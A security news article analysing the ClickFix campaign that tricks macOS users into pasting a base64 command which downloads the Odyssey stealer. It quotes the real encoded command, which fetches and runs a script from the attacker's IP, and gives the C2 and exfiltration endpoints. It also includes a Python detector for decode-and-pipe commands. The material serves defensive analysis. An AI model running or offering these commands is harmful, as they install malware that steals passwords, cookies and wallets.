ClickFix Malware Attacks macOS Users to Steal Login Credentials


In recent months, security researchers have observed a novel phishing campaign targeting macOS users under the guise of a CAPTCHA verification process.

This attack, dubbed “ClickFix,” leverages a blend of social engineering and operating system detection to coax victims into executing malicious commands directly in their terminals.

By mimicking legitimate Cloudflare-style checks, the malware avoids dropping traditional binaries, instead relying on base64-encoded scripts that fetch and run an obfuscated AppleScript payload.


Initially, unsuspecting users navigating to a compromised URL—often impersonating popular trading platforms—are presented with a human verification page tailored to their operating system.

Windows visitors receive innocuous PowerShell instructions, while macOS users are instructed to open Terminal, paste a copied command, and press Return.

macOS instructions (Source – Forcepoint)

Forcepoint analysts identified that this subtle divergence in instructions is designed to trick macOS victims into executing a command that decodes a base64 string and pipes the result into bash:

echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXN0ICY=" | base64 -d | bash

Once the command runs, it installs an obfuscated AppleScript compiled file (.scpt) that carries out the core data harvesting activities. The script begins by creating a unique temporary directory under /tmp, using osascript calls to assemble and execute commands:

osascript -e 'run script "on mkdir(item)\ntry\nset filePath to quoted form of (POSIX path of item)\ndo shell script \"mkdir -p \" & filePath\nend try\nend mkdir"'

Forcepoint researchers noted that, after directory setup, the malware scans the user’s Desktop, Documents, and Library folders for files with extensions such as .pdf, .docx, .key, and browser-specific artifacts including Keychain databases, Safari cookies, and Apple Notes databases.

Beginning of script & creating directory (Source – Forcepoint)

The script proceeds to enumerate profiles in Firefox and Chromium-based browsers, copying saved credentials, cookies, form history, and encrypted wallet files for known crypto extensions like MetaMask and Exodus.

Infection Mechanism Deep Dive

The infection mechanism hinges on the manual execution of a seemingly benign “verification” command. By employing base64 encoding, the attackers obscure the payload’s true purpose, bypassing signature-based detection.
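The decode-and-pipe pattern shown above (an echo of a base64 string into base64 -d and then into a shell) is itself a usable detection signal, regardless of what the encoded text says: the encoding hides the command from plain signature matching, but a collector that sees the full command line can decode the string offline and inspect it without executing anything. The following Python is an added illustration written for this article, not code from Forcepoint or from the campaign; the log lines and the encoded payload are constructed here, and the stager URL inside them is a placeholder (c2.example.invalid), not the real one.

```python
import base64
import binascii
import re

# Constructed sample: a placeholder stager command, encoded at import time so the
# sample log line below is guaranteed to decode to exactly this text.
_CONSTRUCTED_STAGER = b"curl -s http://c2.example.invalid/d/stage | nohup bash &"
_CONSTRUCTED_B64 = base64.b64encode(_CONSTRUCTED_STAGER).decode("ascii")

# Constructed shell-history style events, as an EDR or auditd collector might record them.
SAMPLE_EVENTS = [
    f'uid=501 cmd=echo "{_CONSTRUCTED_B64}" | base64 -d | bash',   # ClickFix-style pipeline
    'uid=501 cmd=ls -la ~/Documents',                               # benign
    'uid=501 cmd=echo "aGVsbG8gd29ybGQ=" | base64 -d',              # decode only, no shell: not flagged
    'uid=501 cmd=echo "QUJDREVGR0g" | base64 -d | sh',              # pipeline with malformed base64
]

# echo <base64> | base64 -d | <shell>; macOS ships both -d and the older -D spelling.
PIPELINE_RE = re.compile(
    r'echo\s+["\']?(?P<b64>[A-Za-z0-9+/=]{8,})["\']?'
    r'\s*\|\s*base64\s+(?:-d|-D|--decode)'
    r'\s*\|\s*(?P<shell>bash|sh|zsh)\b'
)

# Substrings that mark the decoded text as a download-and-run stager rather than a
# harmless one-liner. Presence raises severity; absence still leaves the pipeline flagged.
STAGER_INDICATORS = ("curl", "wget", "nohup", "osascript", "http://", "https://")


def decode_b64(token):
    """Decode strictly; return None for padding or alphabet errors instead of raising."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze_event(line):
    """Return a finding dict for an encoded decode-and-execute pipeline, else None."""
    m = PIPELINE_RE.search(line)
    if not m:
        return None
    decoded = decode_b64(m.group("b64"))
    hits = [ind for ind in STAGER_INDICATORS if decoded and ind in decoded]
    return {
        "shell": m.group("shell"),
        "decoded": decoded,            # None when the token is not valid base64
        "indicators": hits,
        "severity": "high" if hits else "medium",
    }


def analyze_events(lines):
    """Run analyze_event over every line and keep only the lines that produced a finding."""
    findings = []
    for line in lines:
        result = analyze_event(line)
        if result is not None:
            findings.append((line, result))
    return findings


if __name__ == "__main__":
    for line, finding in analyze_events(SAMPLE_EVENTS):
        print(f'[{finding["severity"]}] {finding["shell"]}: {finding["decoded"]!r} {finding["indicators"]}')
```

Two design points matter here. The decoding is done with validate=True and the result is only ever stored as a string, so a malformed or hostile token degrades to a medium-severity finding rather than a crash, and nothing decoded is passed back to a shell. The indicator list is deliberately small and generic (downloader binaries, nohup, osascript, a URL scheme); it is meant to prioritise alerts, not to be the sole trigger, since the pipeline shape alone is already unusual enough on a user workstation to deserve a look.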

When decoded, the payload fetches a highly obfuscated AppleScript from a remote server (hxxp://45.146.130[.]131/d/vipx14350). This AppleScript employs random string obfuscation and nested osascript invocations to hinder static analysis.

Upon execution, it prompts the user for their password to escalate privileges and then collects system profile details via:

system_profiler SPSoftwareDataType SPHardwareDataType SPDisplaysDataType

The harvested data, along with gathered files, is archived into /tmp/out.zip and exfiltrated to the attacker’s C2 endpoint at 45.146.130.131/log.

A cleanup routine then removes the temporary directory to erase traces, complicating forensic recovery.

Odyssey stealer login page (Source – Forcepoint)

By combining familiar CAPTCHA prompts with terminal-based social engineering, the Odyssey stealer delivered through ClickFix demonstrates an evasion technique that sidesteps traditional antivirus solutions, emphasizing the need for heightened user awareness and multi-layered endpoint controls.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.